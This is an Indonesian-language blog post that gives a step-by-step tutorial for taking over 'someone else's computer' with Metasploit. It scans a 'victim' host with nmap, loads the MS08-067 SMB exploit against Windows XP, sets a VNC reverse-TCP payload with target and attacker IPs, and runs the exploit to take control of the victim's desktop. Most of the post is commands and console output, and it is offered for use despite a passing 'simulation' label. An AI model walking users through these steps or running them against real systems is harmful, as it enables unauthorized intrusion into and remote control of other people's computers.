Latest Artikel :
"Saleum Teuka di blog Aneuk Atjeh http://www.daffyafriel12.blogspot.com"
Home » » Cara Mematikan Komputer Orang Lain Dengan Metasploit

Cara Mematikan Komputer Orang Lain Dengan Metasploit

| 0 Komentar

1.Metasploit versi berapa z, karena sekarang udah versi 3.3 maka kita akan
memakai versi baru tersebut tool ini bisa di download di http://metasploit.com

2.Komputer dengan internet karena ini harus ada usahakan dalam satu jaringan
karena kita akan meremote komputer lain, untuk OSnya terserah kita
bisa pake linux, windows, unix ( pke backtrack lebih keren )
3.Nmap tapi buat metasploit framework udah terinclude langsung Nmapnya

4.Ip dari komputer korban ( 192.168.2.78)

5.mau nyiapin apa z terserah dehh

pertama install metasploitnya, klo di mikocok tinggal next, next dst tapi klo
di linux kita tinggal download source filenya terus terus kita install ( ini buat
metasplot framework v3.2) klo buat v3.3 kita bisa langsung runn filenya

./framework-3.3-linux-i686.run /opt (kasih perm buat di execute dulu)

klo udah selesai semua, tinggal kita mulai mengexploit PC Korban( kali ini cuma
cuma simulasi ).

pertama kita scan range ip yg ada dalam satu jaringan komputer, terserah make tool apa
aja deh yang penting bisa tau ip pc teman, klo gw sih sering maku
angry IP Scanner, di sini kita tidak membtuhkan ip public dari korban kita.
Klo udah selesai kita bisa launch metasploitnya

( simulation on Mikocok )
klik metasploit console yg ada di start menu
setelah itu akan muncul jendela metasploit

____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v3.4-dev [core:3.4 api:1.0]
+ -- --=[ 452 exploits - 218 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7628 updated 6 d

msf >

kayak gini tampilan metasploitnya.
scan komputer korban dengan Nmap

nmap -v -O -p445 192.168.2.87

command di atas untuk mendeteksi OS korban serta port 445 terbuka apa g.
klo udah selesai kita ke jendela metasploitnya

ketikan di jendela msf(metasploit)

show exploits
fungsinya untuk melihat exploit apa saja yang bisa di gunakan

karena pada simulasi ini saya menggunakan exploit
windows/smb/ms08_067_netapi
exploit ini terjadi pada OS XP SP2 ke bawah

dari msf ketik
use windows/smb/ms08_067_netapi
setelah itu maka kita akan masuk ke exploit ini
akan muncul
msf exploit(ms08_067_netapi) >
dari situ ketik lagi
show PAYLOAD

TCP Stager
windows/shell/bind_ipv6_tcp Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp Windows Command Shell, Bind TCP Stager
windows/shell/reverse_ipv6_tcp Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports Windows Command Shell, Reverse All-Port TCP Stager
windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
windows/upexec/bind_ipv6_tcp Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_ipv6_tcp Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports Windows Upload/Execute, Reverse All-Port TCP Stager
windows/vncinject/bind_ipv6_tcp VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_ipv6_tcp VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports VNC Server (Reflective Injection), Reverse All-Port TCP Stager


ini merupakan mode apa yang akan kita gunakan untuk masuk ke komputer
korban, di sini kita akan menggunakan payload

windows/vncinject/reverse_tcp

setelah dari situ kita set pada msf untuk menggunakan payload tsb dgn perintah
set PAYLOAD windows/vncinject/reverse_tcp

setelah itu kita set ip dari target

set RHOST 192.168.2.87 -----> komputer korba

set LHOST 192.168.2.2 -----> komputer kita

klo udah selesai kita tinggal launch exploit di msf

tinggal ketik

exploit

tunggu setelah selesai, akan muncul jendela desktop dari komputer korban.
kita tinggal remote komputer
Share this article :

No comments:

Post a Comment

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Daffyblog.com - All Rights Reserved
Template Modify by Creating Website
Proudly powered by Blogger